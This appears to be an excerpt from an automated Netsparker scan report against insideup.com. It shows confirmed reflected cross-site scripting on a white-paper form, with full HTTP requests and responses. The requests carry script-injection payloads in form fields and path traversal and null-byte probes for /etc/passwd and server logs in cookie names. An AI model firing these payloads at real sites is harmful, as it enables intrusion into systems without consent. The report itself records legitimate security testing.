companyServices POST '"--></style></script><script>alert(0x0003B8)</script>
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003B8)%3c%2fscript%3e&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:19 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DA48E834479055D75BDFD5DF17795632; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="'"--></style></script><script>netsparker(0x0003B8)</script>"/> </td> </tr> <tr> <td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST '"--></style></script><script>alert(0x0003F5)</script>
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 206
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003F5)%3c%2fscript%3e&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:28 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=0D21F11002A3C6CBCAE1E116BCC8AE25; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" 